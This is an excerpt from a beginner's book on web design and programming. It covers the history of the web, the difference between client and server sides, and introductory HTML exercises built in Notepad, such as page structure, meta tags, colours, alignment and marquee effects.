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PREFACE 
 

 

 

 

Can you imagine our world without the internet or the web; it will definitely be a disconnected, 

expensive, static and boring world you won’t like to live in. 

some older guys and daddy can recall their experience to when they have to post a letter through a 

post office and have to wait for  God know when, even sometime it never arrive at its destination 

this can really hurt a lot if is for your Girlfriend, imaging you spending day to rack you heading at 

come up with those charming breath-seizing line of letter, only to post it from Lagos to Anambra for 

month no reply because you never knew when it will get to your lady, that’s if it get there. The same 

is for Business, you pay so much to get the grin-grin-grin Telephone on that table yet it’s not easy to 

reach someone in Australia or China, I can continue to give you more examples but the bottom line 

is that this Technology as really changed our life, the way we live, work and socialize therefore 

making the world a small place where you can reach anyone, anywhere is a few seconds or minute 

without stress. 

The web actually have a humble beginning, the founder () have the dream of having a platform for 

organizations not even business or small users like you and myself, we are talking about US 

government own organization like the military, university, research institute and other similar 

organization to share information contain in their website via the internet, no more no less, mind 

you it was a huge success then even though the website is just a static piece of HTML layout 

WebPages. Then come those guys  in business, embarrassing the web after sighting the big 

difference this will do to their trade before you know it the web is everywhere, this was when the 

Google run into a problem remembering the website they had visited earlier which lead to the 

invention of the world leading search engine “Google”.  

But today the web is not just limited to some pages of website that contain information accessible 

via the internet, today web is more dynamic and even finding their way into what the traditional 

desktop application have been doing for ages,  social network, business application, e-mail, e-

commerce, e-learning and other e-etc. all have now have something to do with web, this has help to 

bridge continent, making the world a global village yet reducing the cost of doing things the old way, 

yet bringing fame and fortune to anyone who care from the big names to young nobody.  
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INTRODUCTION 
This Introduction will not be make by me, I think a reply I found to be very interesting and enlighten 

by Dr.Kameleon  on stackexchange website forum title "How to be a successful programmer 

without a CS degree" will be best to introduce this book: 

I am 26 years old, and thanks to my father (btw, a mathematician and currently working as a 
professor) I've had the chance from a very early stage of my life to be around computers. 
(back in 1986 when I was born, though not the most common thing in those days, we always 
had one or two computers at home). That being said, and - obviously because of my curious 
and math-inclined / problem-solving oriented nature - it wasn't long before I found myself in 
love with programming. First with Pascal, at the age of 7-8 and then pretty much everything 
else just followed. 

First, let me say that, while at school, I've always excelled in anything math-related, simply 
because I liked it, and honestly I could easily follow my father's example and become a 
mathematician too. But that didn't happen. 

What did happen was probably the biggest mistake of my life (so far) : What would you call it 
when someone in love with code, who speaks 15+ languages and has written thousands of 
lines of code (from compilers to micro-kernels and web frameworks) by the age of 18, 
suddenly (the reasons are still too obscure in my mind, but the general, even if subtle, 
influence of your environment is never too negligible) decides to pursue a career in 
Medicine? I guess a "mistake". 

The result? 5 years later (at 23), and 1 year before finishing my Med degree (still working on 
personal open-source programming projects as a hobby all the time), I decided I've had 
enough and decided to quit. And it was not only that I hated this new field (Medicine) so 
much, but also that there was something unsettling in this whole situation, an insatiable itch 
hidden deep inside... (what would it have been if...? ) Moreover, I had just realized that my 
hobby, what I considered great but had not even imagined as a real job, could not only bring 
some money but bring me lots of it + keep me happy as an individual. So, I decided to quit. (= 
the best choice, even if a bit late, I've ever made). 

So, here I am now, an once-gonna-be-doctor (on-the-verge-of-a-nervous-breakdown 
psychiatrist to be precise; stupid me!) going for a CS degree (on my 3rd year actually; and, 
honestly, pursuing it in order not to end up lacking in those dreaded typical qualifications...) 
and a more-than-happy professional working on something that I adore and definitely the 
subject on which I have to offer the most. 

A few observations (from my own experience) 

 Programming is one of the very few fields where the really good ones will always 
find their way up, no matter what. And this is most definitely NOT a matter of 
typical qualifications (honestly, if I had a company and wanted to recruit 
programmers, I can easily tell who's good in a matter of minutes - regardless of 
whether he even has any degree or not) 

 What it takes to be a good programmer is : math-oriented intelligence (but NOT 
maths itself) and passion (that will make the endless hours of studying a pleasure 
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instead of a burden; and, even if I haven't realized that, trust me i've studied TONS of 
material on the subject in my life, purely on my own). Formal education is a nice 
thing, but it's a bit overrated. The core ingredients of success are the first two. 

 Maths is definitely where CS was born. But CS is not just maths anymore. I've 
always had a strong math-oriented brain, but I'm by no means a math guru. And 
honestly, in every day programming, (unless you're into building a graphics engine or 
something too localized) you'll most likely never need anything other than simple 
arithmetic (addition, subtraction, multiplication, division, modulo) and a few things 
about arrays. (many will disagree with me, probably mathematicians or too 
academic-oriented programmers, but definitely mastering calculus is NOT what it 
takes to be a good programmer). Having a good math background will maybe help 
you, but NOT because of the math itself; it'll help you solely based on one common 
thing these two field share : problem-solving skills. 

 Maths is a science (and a science I respect). 
 Programming is an art. (And an applied science as well, if you insist) But keep that in 

mind : an art - and that's how I've always treated it. And as with all arts, it cannot be 
taught. I may teach you the formal way of drawing a face and make you better than 
average but that won't make you neither a Da Vinci, nor a Klimt. Mona Lisas are 
painted by Da Vincis, and not by carefully educated painters. Great code is written by 
great code artists. And skill and devotion can easily outbalance formal education. 

So, what does it take to become a *really* good programmer? 

 Being smart, great problem-solving skills and a passion for the subject (if you don't 
have it, just leave it; being mediocre is no excuse) 

 Lots of time to devote to the subject 
 Studying all the time ('coz you'll simply never know it all; and note: why does 

'studing' has to be related to some degree? I've always found it far more 
pleasure doing things on my own pace...) 

 Writing code all the time (no matter how many books you have read; your coding 
level is directly equivalent to the amount of code you've written) 

 And again, LOVE for the subject (if you don't love it enough, and I mean really love it, 
all of the above will sooner or later become unbearable; for me, coding as a job is 
still like getting paid for... watching movies : absolutely absurd but yet simply great) 

….. 

Get to know what you want to do, and trust your instinct. Of course, having a solid basic 
knowledge is a must. But what you'll delve into, it's entirely up to you. Also, plan your career 
carefully : if you want to be employed, then choose your target and be great at it (e.g. 
wanting to be employed by Google and not knowing how to read a simple Python script is 
probably one of those no-go situations). If you're starting something on your own (a 
company), then you have no "boss" to satisfy; just pick what suits you best. 

For example, if you want to do something web-related, I'd definitely advise you to go for : 
PHP / MySQL / HTML / CSS / JavaScript (+jQuery/AJAX). But that's just me. Someone may 
like (or see more future in) Ruby/Rails than in PHP. 

I, for instance, am now primarily coding in Objective-C / Cocoa. Would I advise you to pursue 
that? Definitely not. That is : unless you're into Macs or want a career selling Mac/iPhone-
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related software. If you're into Windows development, going for C# / .NET Framework would 
probably be your best choice. (if you want to get an idea of what I'm mostly into, just have a 
look in my StackOverflow Profile) 

“What is the best way (over the next two years) to supplement my education to attain 
those attributes in such a way to match or even surpass the level of a CS undergrad 
from a top university?” 

Study a lot (books, internet, other people's code, whatever) and write as much code as you 
can. 

Ah, and try to get a job in anything code related. (I first started working as a freelancer and 
it's been a really valuable experience, just to see how things really work in the real world). 

Just my .2 friendly cents... :-) 

Sidenote : I know that some of my points may seem controversial, and i'm sure that there'll 
be many who will disagree with me. That's acceptable. But that doesn't change the way I see 
things - and especially the things i love. 

By: Dr.Kameleon  

Source: http://programmers.stackexchange.com/questions/145784/how-to-be-a-successful-

programmer-without-a-cs-degree  

If you read this intro carefully you will see truly that it really worth using for the introduction of this 

book. 

 

WHY I WROTE THIS BOOK 
I wrote this book to serve as a one-stop-shop, for want-to-be web designer, programmer and any 

interested person (because I try to cover many topics related to web, such as HTML, CSS, JavaScript, 

Fireworks, Dreamweaver, PHP and MySQL  ) just like me. What many aspiring developer or 

programmer needs is a push or a dive to programming, but because web development is a different 

animal that require not just a programming skill, that is why I go through the pain to cover all this 

topics to enable you to start building web based system or application. 

Besides in my few years of programming I have come across many want-to-be-programmers wanting 

me to teach them how to  program or developer web application, because I am a profession in this 

field, fluent with web technologies and some language such as PHP, C#, and Java; a lot of this people 

are really serious about pursuing this passion; some are computer science graduate and 

undergraduate and some fine and applied artist, while many are curiously driven to learn 

programming, I’ve tried my best to teach, guide and mentor many of such people, although I’ve 

recorded some success in this pursuit although not with some people.  

http://stackoverflow.com/users/1270812/dr-kameleon
http://www.vworker.com/RentACoder/DotNet/SoftwareCoders/ShowBioInfo.aspx?lngAuthorId=7062975
http://programmers.stackexchange.com/posts/145930/revisions
http://programmers.stackexchange.com/questions/145784/how-to-be-a-successful-programmer-without-a-cs-degree
http://programmers.stackexchange.com/questions/145784/how-to-be-a-successful-programmer-without-a-cs-degree
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The reason for this is partially my fault, first; it’s not easy for a full-time web and software developer 

to teach more than a hundred people programming and still have time to meet the dead-lines from 

client, secondly; the time taken to study and get formal education at the university. Thirdly, (this is 

the fault of some student) some learner are lazy to understand that programming is an act that need 

to be practice several hours a day with the intention of solving a particular problem, (which is 

beyond just learning the syntax of a programming language). 

In a nutshell, after several months of thinking and analyzing why learning programming is a 

nightmare or doubting task, I come up with the idea of this book you are reading now, with the aim 

to reach more people and share my knowledge and experience with them, which I may not be able 

to do in person. 

 Why PHP: I chose PHP because when I was learning programming I felt reinforced if my code 

is running without error and challenged, immediately I start battling bugs or error, so I came 

to the conclusion that naturally learner will enjoy learning programming if they have more 

progress than spending long hours trying to understand some complex logic, architecture or 

framework, common with Java, C++ and C#, my second choice of language for this book 

would have been Python (I love this language) but the only setback with Python on web 

development is that web hosting that support Python is not as common (for now), unlike 

PHP that is available on almost every web hosting server this day. 

So I chose PHP because it is easier to learn, compare to the aforementioned, it is great for 

programming web application and its popularity. 

 Why WEB: learning programming for programming sake is not the best approach to 

mastering the programming. It’s like learning how to drive a car without the car leaving its 

position or moving. Therefore the best approach to learning programming is to start solving 

real live problem, with PHP already chosen as our preferred language web stood as the best 

project we can start coding, again web will allow you to start making some money because 

most programming project today a web related. 

 

ARCHITECTURE OF THE WEB 
When it come to the structure and how the web work, several terms cannot but be mentioned, but 

it’s our aim when writing this book to keep things as simple as possible and when we have to make 

use of any term we will try to explain it to your understanding, don’t also forget to contact us via our 

website is you have any question www.bengallery.com/webbook 

Before we begin this challenging, interesting and fulfilling career, I think it will be good if we step-

back a little to see the difference between the internet and the web, as this two can be confusing to 

some people. 
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THE INTERNET AND THE WEB 
Some people still doesn’t know the difference between this two, simply put it this way; the internet 

is a international channel thought which web make’s it information available to the world , although 

the web is not the only resources transported via the internet although it is the biggest and most 

talked about, others include email using , etc, hey! Do you know that Microsoft outlook (a desktop 

application, communicating via the internet) is still widely use to send and receive email in some 

corporate places although the web-based version such as yahoo mail is more popular.  

By the way: some web such as web-based application may not require the internet but 

intranet or local network, if its users are within, let’s say the same office or within the same 

computer, in this case we say the user computer is hosting the server where the web-based 

stuff resides, we will discuss more about this thing called server and how to related to web 

in the next chapter (Architecture of the web). 

A closer look at the web 
Website is simply a collection of pages (called WebPages) linked (called hyperlinks) together so that 

information contain in different pages of the website can be reached of access by you and I, for 

example our website www.NEMSacademy.com  contain hyperlinks (Home, Learn Programming, E-

Learning Solutions, Art Gallery etc.) See the screenshot below.  

 

To view the Page source, View > Source 
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The screenshot below is the page source of this page. 

 

This source code contains clients-side codes ONLY such as XHTML, JavaScript, XML, CSS and other 

client-side related stuff 

Hope you understood the illustration above, now we can take a better look at Web Page, from the 

two sides (The client-side and the server-side) 

 

 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

10 

 

The Client-side and Server-side of the web 
The User-interface of the web is about the beautiful and attractive interface you see when you visit a 

website, such as the text, the colours, images, animations, forms and every other thing you can see 

web browsing a website, try and see it this way, the user-interface of the website is about the client-

side area and it is the main business of the web designer, graphic designer and other creative people 

out there.  

Now you may be thinking, am I going to go through all this and the answer is yes! If you wish, 

because this book is designed to guide you through the building of a web solution from start to 

finish, although you can skip this part and let your designers handle this. 

 

 

HTML 

You must have read in the introduction when we mentioning html, and you might not be very 

comfortable with this term if you are new to web, so we discuss more about HTML here. 

HTML stand for Hypertext Markup Language; this is more or less the basic language for creating a 

web page; that means that an HTML web page can contain; that is embed with, other stuff such as 

JavaScript, XML, CSS and other client side related stuff although the later can be kept in their 

respective pages. “More terms!” you may say, just keep reading. 

 HTML tag can be written into file or page with .htm or .html file extension e.g. Index.htm or 

index.html 

HTML keep improving from the older versions to XHTML to HTML4 and now HTML5 in future we 

may see more versions coming up, but regardless of which version; your knowledge in an older 

version can be very useful in newer versions, this is called backward compatibility in programming.  

the difference between any version  two, tags are not much.  You will learn more about HTML later 

in this book. 

 JAVASCRIPT 

JavaScript remains the most popular client-side scripting language use for adding some interactive 

function to the web experience.  

JavaScript can also be written into its separate file with, .js file extension e.g. Calculate.js 

The calculate.js can now be called or refer to in HTML file. You will learn more about JavaScript later 

in this book. 

CSS (Cascading Style Sheet):   

CSS is use for best formatting of a web page, this task of formatting can be done with HTML tag, but 

CSS does it best, besides it’s the standard for formatting a webpage .  
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CSS style can be embed into HTML, just like JavaScript or kept in its separate file, with .css extension, 

e.g. Style.css 

You will learn more about CSS later in this book. 

 

Client-Side Technology 
HTML or XHTML as well as the other technology mentioned above are all Client-side technology, 

which means they are executed or translated by your Web Browser such as Microsoft Internet 

Explorer, Mozilla Firefox, Opera, Safari, Chrome or Netscape Navigator, without the support or 

interference with a server or its resources. We will discuss server-side technology later. 

Now that we have mentioned executed or translated above I think it would be nice to introduce you 

briefly to how computer programs are executed. 

Computer programs are command or program written by programmer, that is you and I to instruct 

or tell the computer what to do, this is how all does cool software are written, developed or created 

such as you Microsoft Word, but for this to be possible you must have an Interpreter or Compiler 

installed or setup on your system or computer to help you translate it to what the computer can 

understand, this is because your computer understood only machine level language while your 

program or source code is written in a high level language, that is human readable language while 

you. 

Likewise the role the compiler or interpreter is playing is similar to what your web browser software 

doing in translation your HTML tag, JavaScript client-script and CSS style into something meaningful, 

attractive and interesting web experience. 

 

Let’s put this into practice 

I believe your computer is running on Microsoft Windows operating system, if yes, then you got all it 

take to put the practice into test, because Microsoft include some cool software with their Windows 

operating system,  such as their own web browser Internet explorer and the notepad text editor 

which is all the recipe needed to run the sample below. 

Note: this example is done using Microsoft Windows XP Operating Systems 

Starting Notepad the text editor you use to create HTML webpage. 

STEP 1. Click the “Start” button, from the task bar 

STEP 2. Point to the “All Programs” to display its sub-menu 

STEP 3. Then point to “Accessories” to display its sub-menu 

STEP 4. Click “Notepad” from the list, after to Notepad as started, type the HTML tag below into the 

Notepad text editor.  
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<html> 

<head> 

<title> Website title here </title> 

</head> 

<body> 

Website content here 

</body> 

</html> 

When done with the typing, we are ready to save the web page 

STEP 5. Click “File” from the menu bar 

STEP 6. Click “Save” or “Save As..” from the drop down list. 

STEP 7. The Save dialogue box will appear, Click “Desktop” from the left side (this means we want to 

save the webpage on the desktop. I prefer saving the page here for easy access) 

STEP 8. Type in “welcome.htm” in the “File Name” box of Save dialogue box and click the “Save” 

button 

See the screenshot below. 

 

Note: without the “.htm” file extension the “welcome” file will not be recognize as an HTML webpage 

 

Now close or minimize the Notepad program and any other open program to ensure you are seeing 

the Desktop environment. 

Surely I am expecting you see the “Welcome” webpage on your desktop; now watch it, if the 

webpage Icon on your screen is different from mine, don’t worry, it’s because you have more 

another browser installed on your computer besides Microsoft internet explorer and you must have 
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set it to your default browser, below is a screenshot of the webpage in Mozilla Firefox and Internet 

Explorer. 

 

Now double click on the “welcome” webpage; the result on your browser screen should be similar to 

the one below. 

 

That all for now, we will learn more about HTML later in this book. 

As you can see you don’t need any complex stuff or internet to create an HTML webpage, as internet 

is just a channel to make you website available internationally. 

So far we have focused our attention on HTML and its other client-side technology, but we will like 

you to know that the web also have another side called the server-side technology.  

Without the server-side the web won’t be very interesting to browser and there will be no web-

based software or applications. Can you imagine a yahoo mail where you cannot create an account, 

a Facebook that you cannot post or chat or a Google you cannot search; that what it will be like 

without the server-side life of the web. 

 

The Server-Side Technology 
Looking back to the first practical example above you will notice that we do not necessarily need a 

web server to test it, as all it needs is just your web browser. 

But not every webpage can be processed by the web browser alone, such as a PHP, JSP or ASP.NET 

file or files programmed using similar programming language because they may or may not contains 

HTML, JavaScript, XML or CSS which are all client-side technologies, therefore this file require the 
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presence of a server and application server to execute their program. For example, this program may 

be to store your record (into a database on the server) after completing a registration form or even 

to restriction login access to only registered member of a forum, or to keep track of your orders in a 

shopping Website and so on. 

Below is an illustration showing how a typical server-side technology works, during a database 

interaction. 
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CHAPTER 1 

CREATING WEBPAGE WITH HTML 
 

A lot have been said about HTML in the preface; in this chapter we will be getting more familiar with 

this important technology by taking more practical exercise.  

HTML is a standard markup language use to define web layout, it is also consider as one of the oldest 

web technology. 

An HTML webpage is simply a text file with .htm or .html file extension. You can create an HTML 

page using any text editor such as Notepad for Windows user or Vi for Linux user or even more 

Advance web authoring tool such as Microsoft FrontPage and Dreamweaver. I will strongly advice 

you learn HTML using a text editor, because most web authoring tools will provide you with so much 

support that you may end up considering writing HTML tag a old-fashioned way of creating a 

webpage, because you will surely fall in love with the charming and easy to use WYSIWYG features 

of this tools, folks must have also told you this, but I bet you will be trapped someday unless you are 

not thinking of becoming a professional in this field of web development; so I’ll advise you to humble 

yourself and learn the simple tags of HTML very well, so as to have a strong web foundation. 

By the way 

WYSIWYG: acronym for What You See Is What You Get, It a feature of powerful web 

authoring software  that  allows a web designer to view a webpage as it will appear in the 

web browser, and to directly edit the text, graphics, or other elements within that view 

without coding HTML.  

The exercise we had in the preface shows us how to create an HTML page, so let’s explain what the 

HTML code does in more detail. 

Welcome.htm 

<HTML> 

<HEAD> 

<TITLE> Website title here </TITLE> 

</HEAD> 

<BODY> 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

16 

 

Website content here 

</BODY> 

</HTML> 

  

The code above is just a skeletal look of an HTML webpage.  Before we explain the HTML tag of the 

page above, we need to understand some HTML rules.  

Firstly: The HTML tag are place inside the less-than (open angle bracket) “<” and greater-that (close 

angle bracket) “>” signs. For example <HTML>, <HEAD>, <TITLE>, <BODY> and so on. 

Secondly: “Almost” all the tags come in pairs, that is the opening and the closing tag, which are 

similar except that the closing tag contains a forward-slash.  

For Example <BODY> </BODY> 

Thirdly: Many tags provide variety of options or attributes that redefine its functions or how it can 

be use, for example to display of text or image.  

For example <FONT SIZE=”10”>Text may be bigger </FONT> 

Fourthly: you can include (nest) one pair of tags within another pair but you must make sure that 

you close the inner nested tag in the same order they are open.  

For example: <FONT SIZE=”7”> <B> Text may be bigger </B> </FONT> 

<B> is nested inside <FONT>, therefore you must close </B> first 

Finally: Every HTML tag must conform to w3c HTML standard (The body that is create and manages 

a lot internet standard, including HTML, CSS, XML and many others), this means that you must learn 

and use correctly the HTML tags, because they all means something to the web-browser. That why 

you are not expected to put just anything inside the “<” and “>” sign and expect wonder. (Beside it’s 

the tags we are learning how to use here) 

 

Now that we are clear, I believe we can move on to explaining the code above line-by-line. We start 

with the HTML opening tag <HTML> and ended page with the pair of the HTML closing tag 

</HTML> 

Now inside the <HTML> and </HTML> we will basically have two main tag sections: 
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HEAD tag <HEAD> </HEAD>  

and  

BODY <BODY> </BODY> tag. 

By the way 

Your HTML opening and closing tag <HTML></HTML> can be place on the same or on 

different lines as we did; it makes no difference; as far as you can read and understand your 

code; for example 

<TITLE>Website title here</ TITLE> 

Is same as: 

<TITLE> 

 Website content here 

</TITLE> 

 

 

The HEAD tag section now contains the TITLE tag <TITLE></TITLE>  

<HEAD> 

     < TITLE> Website title here </ TITLE> 

</HEAD> 

Notice:  I purposely push (indent) the TITLE tag inside a little, for you to understand that it is actually 

inside our under the HEAD tag, this is for easy readability of the code. Expect more of this indenting 

style in later programs in this book.  

The TITLE is probably one of the visible tags in the HEAD you will be see when you preview your 

webpage in a browser. 
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As you can see in the screenshot above, the text that appears in the TITLE tag is displayed on the 

title bar of the browser window.  

 

META Data 
Although the TITLE tag may be the only visible tag in the HEAD tag, but they are other important tag 

that can be on the HEAD, one of such tag is the META tag, that specify the description and keywords 

that makes your website friendly for Search engines such Google search, yahoo search, ask and 

others to easily find your website on the internet. 

Below is an example of what a META tag looks like: 

<HEAD> 

   <TITLE> Website title here </TITLE> 

   <META NAME="Keywords" content="html, css, tutorial, xhtml, 

   javascript, programming"> 

   <META NAME="Description" content=" Web Application"> 

</HEAD> 

As I said earlier, the META tags are not visible when you preview your webpage; they only enhance 

your website accessibility by the Search engines. 

Now let’s look at the second section of the tag, which is the BODY tag  

<BODY> </BODY> 

You remember in English language, letter writing, you are taught that the body of the letter is where 

you discuss the main point or probably pour out your mind. Same is truth with the HTML BODY. 

The body is the area that display all the attractive stuff you see on the web browser main windows, 

this include colorful text, pictures, links and others. 
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In the last example we have just some scanty text in the body, as shown below. 

<BODY> 

Website content here 

</BODY> 

this shows the text in the body of the browser. See below 

 

 

Background colour 
The BODY tag has other parameter or attributes, so I think it would nice if we explore how to add 

background color for body of web page by extending the <BODY> tag. 

<BODY BGCOLOR="green"> 

 

Example below: 

 

<HTML> 

<HEAD> 

<TITLE> Website title here </TITLE> 

</HEAD> 

<BODY BGCOLOR="green"> 

Website content here 

</BODY> 

</HTML> 
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The green background preview 

Adding a color using the name such as “green” in the BGCOLOR parameter of the BODY tag might be 

easy but it is not considered a standard as some browser may not understand It or If you type a 

colour name such as “LIGHT BLUE” therefore the “hexadecimal” number standard is more 

recognized therefore enabling you be able to produce 16 million colors for your web design. Let’s 

see an example below. 

<HTML> 

<HEAD> 

<TITLE> Website title here </TITLE> 

</HEAD> 

<BODY BGCOLOR="#00FF00"> 

Website content here 

</BODY> 

</HTML> 
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The light-blue background preview 

Format of color number is RRGGBB. Each color is a combination of three main colors: Red, Green 

and Blue (a popular computer color generation standard). In color format RR is value of red 

component of the main color in hexadecimal format. GG is value of green component and BB is the 

value of blue component. 

Two digit hexadecimal number can be anything between 00 to FF i.e. 0 to 255 in decimal format. 

So if we write 00FF00 we mean (red=0, green=255, blue=0) so the result is a pure green color. See 

www.w3c.org for more 

HTML Versions 
As said earlier HTML is a standard and it keep undergoing new changes from w3consortion 

www.w3c.org to keep it up-to-date with new technologies and standard new version is introduce 

after some time, often years. For example XHTML is another newly introduce version of HTML. 

(Although HTML5 currently the latest version as of the time this book is written) and incorporates 

aspect of XML. 

XHTML uses virtually all of the HTML elements. Nevertheless, XHTML imposes new rules that require 

you to squeeze your HTML tag to make your HTML webpage XHTML compliant. Let take a look at 

some of the rules: 

 

http://www.w3c.org/
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XHTML encourage a lowercase. This means that the tags must be in lowercase. For example, 

<BODY> should be change to <body> 

According to XHTML standard, every tag must be close, for example <title> is the opening tag, 

while </title> is the closing tag, and the text in-between the opening and the closing tag is 

content which the tag affects;  even in a tag without content such as <br />, the tag is closed in 

the same tag that open it. Notice there is a space between the last letter of the tag and the forward 

slash. 

Attributes must be enclosed with double quotations  

<img src=”pix.jpg” /> 

 

Setting up a website 
Actually a website is merely related and often linked (hyperlink) web pages and its related files such 

as images, CSS style sheet, sound etc. Because these files including web pages we grow from few file 

and tens and hundred or more file, it is however important we use folders and sub-folders to keep 

this related together. So we could liken the parent folder to be the website. 

We will continue our exercise by creating a new page so as to refresh our memory as we continue, 

although similar to the last example but instead of just dumping our webpage on the desktop it will 

be better to have it inside a folder probably named after the website so as to keep things organize 

and easy to manage the “website”. 

For example, we want to create a website for our organization Bengallery Information Technology; 

we can start by creating a folder or directory name “BIT website” that is an abbreviation for 

“Bengallery Information Technology” and have all our webpage and its related files such as pictures 

or CSS file inside the same folder as we will see shortly. 

Creating the BIT website 

STEP1 Right click the blank space on the desktop 

STEP2 Point to New, from the menu list 

STEP3 Click “Folder” from the sub-menu, immediate you should see the folder on the desktop 

screen, then type “BIT Website” to rename the new folder and deselect.   

See the screenshots below. 
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Creating the new folder 

 

Rename the new folder 
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After deselecting, by clicking the blank desktop area 

Note: you can have your website anywhere in your computer, not only on the desktop. 

Then after this is done we can start to create our webpage inside the “BIT website” folder. 

 

Creating the Webpage 
Creating you webpage needs some planning to determine the pages your website will need or 

require. 

However regardless of your plan and number of pages, one page is inevitable; The Homepage. The 

homepage also known as the index page and it’s the first page that appear when you visit a website, 

for example you visit our website www.nemsacademy.com your web server automatically return 

www.nemsacademy.net/index.php because the “index.php” is the Homepage. 

Never mind the .php extension is because we have the programmed using PHP we will learn about 

PHP later in this book, but for now assume it is index.htm.  

So we will start by creating our INDEX page (index.htm) using notepad just as we did earlier. 

 

Starting Notepad 

STEP 1. Click the “Start” button, from the task bar (below the desktop environment) 

STEP 2. Point to the “All Programs” to display its sub-menu 

STEP 3. Then point to “Accessories” to display its sub-menu 
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STEP 4. Click “Notepad” from the list, after Notepad had started, type the following into the text 

editor.  

<html> 

<head> 

<title> Bengallery Info. Tech. (BIT) the leading web solution 

developer </title> 

</head> 

<body> 

BIT is an IT company who specializes in delivering web solution 

 

OUR SERVICES 

We have recorded a huge success in: 

Designing Website  

Deploying Web-Portal  

Developing Web-based software  

Web / IT consultation services  

Web Management 

</body> 

</html> 

 

When done with the typing, we will now save the web page inside the BIT Website folder we have 

created on the desktop.  

STEP 5. Click “File” from the menu bar 

STEP 6. Click “Save” or “Save As..” from the drop down list. 

STEP 7. The Save dialogue box will appear, Click “Desktop” from the left side, you will see the “BIT 

website” folder we created earlier as well as other icons. 
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STEP 8. Double click the “BIT website” folder to open it. 

STEP 9. Type “index.htm” in the “File Name” box of Save dialogue box and click the “Save” button 

 

Note: without the “.htm” file extension the “index” file will not be recognize as an HTML webpage 
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When you open the webpage by double click the “index” webpage in our “BIT website” folder. 

 

The result should look like the screenshot below: 

 

The preview of the index page 

You might be wondering why all the text in looking scattered and clumsy  rather than appearing on 

different line as entered in notepad, I purposely use this example so as to draw your attention to the 

fact that you may have your text type on different line in notepad as we did, but that will not make 

any difference when previewed on a browser, remember you are not typing a document in MS 
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Word, this is HTML where every output is controlled by some sort of tag as you will lean in the next 

exercise using break line, paragraph and alignment. 

 

Break Line, paragraph and alignment 
Now that we have our homepage we will be editing it to make the break line, paragraph and 

alignment changes to the page. 

 

Editing the webpage 
Follow the step below to do this: 

STEP1. Right click on the webpage 

STEP2. Point to "Open With" from the menu list 

STEP3. Then click "Notepad" from the sub-menu 
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Note If Notepad can't be found in the sub-menu, 

STEP3. Then click "Choose Program..." on the sub-menu 

STEP4. When the "Open With" dialogue box appear 

STEP5. Click Notepad from the list of Programs 

Finally our page is in editing mode, using Notepad. 

Now put Break line <br/>  and Paragraph <p> tag as shown below: 

<html> 

<head> 

<title> Bengallery Info. Tech. (BIT) the leading web solution 

developer </title> 

</head> 

<body> 

BIT is an IT company who specializes in delivering web solution  

<p/> 

 

OUR SERVICES <br/>   

We have recorded a huge success in: <br/>   

Designing Website <br/>   

Deploying Web-Portal <br/>   

Developing Web-based software <br/>   

Web / IT consultation services <br/>   

Web Management 

</body> 

</html> 

Now save the webpage. Click View > Save 

As usual double-click the file to preview it OR if it is already open, click the refresh button (See the 

refresh symbol in the screenshot)  



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

30 

 

 

Below is the preview of the changes we made 

 

You will notice that the paragraph tag <p/> is equivalent to two break line <br/>, the paragraph 

tag <p/> also have some interesting attribute, such aligning text (not limited to text but any object 

in-betweens its tags, such as images or table) to three main position (left, center or right), let’s take 

a look... 

 

Align to centre 

<p align="center"> this text will appear at the centre of the screen 

</p> 
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Align to right 

<p align="right"> this text will appear at the right of the screen 

</p> 

 

Align to left 

<p align="left"> This text will appear at the left of the screen 

</p> 

Let’s continue with our BIT website, edit the index.htm webpage as usually and align the “BIT is an 

IT… “ text to center. 

<body> 

<p align="center"> BIT is an IT company who specializes in 

delivering web solution </p> 

 

OUR SERVICES<br />   

We have recorded a huge success in: <br  />   

Designing Website <br/>   

Deploying Web-Portal <br  />   

Developing Web-based software <br  />   

Web / IT consultation services <br  />   

Web Management 

</body> 

 

We’ve decide to leave some HTML structure out of the sample above, they structure should still be 

complete in yours. 

Save the webpage. Click View > Save 

And refresh as shown below. 

The sample should look like the one below. 
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Special character, bold, italics, underline and marquee 
First I will like us to look at this triplet (BOLD, UNDERLINE and ITALICS) and to connect with the last 

exercise let’s apply this three. 

Reach to the “BIT website” folder and edit the “index.htm” web page as usual; to look like the one 

below. 

<body> 

<p align="center"> <i>BIT is an IT company who specializes in 

delivering web solution </i> </p> 

 

<b> <u> OUR SERVICES </u> </b> <br  />   

We have recorded a huge success in: <br  />   

Designing Website <br  />   

Deploying Web-Portal <br  />   

Developing Web-based software <br  />   

Web / IT consultation services <br  />   

Web Management 

</body> 

Below is the preview below 

 

 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

33 

 

I believe this it’s quit explainable, except for where we have two tag nested <b> <u> OUR 

SERVICES </u> </b> this apply the both bold and underline to the text within. 

 

MARQUEE 

Now let’s take a look at the interesting marquee. Marquee are use to add some scrolling effect to a 

text or image. Marquee has so many attribute, but we will be taking a look at some of the basic and 

common use of marquee. 

<marquee> This is the message in a marquee </marquee> 

This is the use of marquee in its simplest form, you can simply add this line of code in between the 

body tag of your HTML page, and watch the text in between the marquee tag, scroll from the right 

to the left side of the screen. 

Marquee delay 

You can also increase or reduce the speed of the text, in between the marquee by add a scroll delay, 

as shown below. 

To make the text move slow 

<marquee scrolldelay="500"> This text will move very slow </marquee> 

To make the text move fast. 

<marquee scrolldelay="5"> This text will move very fast </marquee> 

Marquee behavior 

You can also add some other behavior to the marquee such as: 

Slide: text move from one end and stop at the other end, instead of continues scrolling. 

The line below shows an example. 

<marquee scrolldelay="5" behavior="slide"> move once 

</ marquee > 

 

Alternate: text move from one end touch the other end and return, repetitively. 
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The line below shows an example. 

<marquee scrolldelay="5" behavior=" alternate ">  

Bounce from one side to the other 

</ marquee > 

Marquee direction 

Using the marquee direction attribute you can specify the direction you want the text or image in 

between the marquee to move. See examples below  

LEFT 

<marquee scrolldelay="1" direction=" left ">text here</marquee>   

This is the default movement. 

RIGHT 

<marquee scrolldelay="1" direction=" right ">text here</marquee>   

DOWN 

<marquee scrolldelay="1" direction=" down ">text here</marquee>   

UP 

<marquee scrolldelay="1" direction=" up ">text here</marquee>   

 

FROM MY CODE PROJECT 

It is always interesting to know how what we called common such as marquee could have so much 

impact when it is required or needed.  

For a very long time I never really use a marquee until a client of mine demanded; only what I knew 

could really be best done, with a marquee. 

 

A BLOG PROJECTS 

The project was to show a series of news, scrolling from down to up and when a user point his/her 

mouse the scrolling pause, probably so that they could read and when the mouse is moved away, 

the scrolling continues. Let’s see the code below. 
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<html> 

<head> 

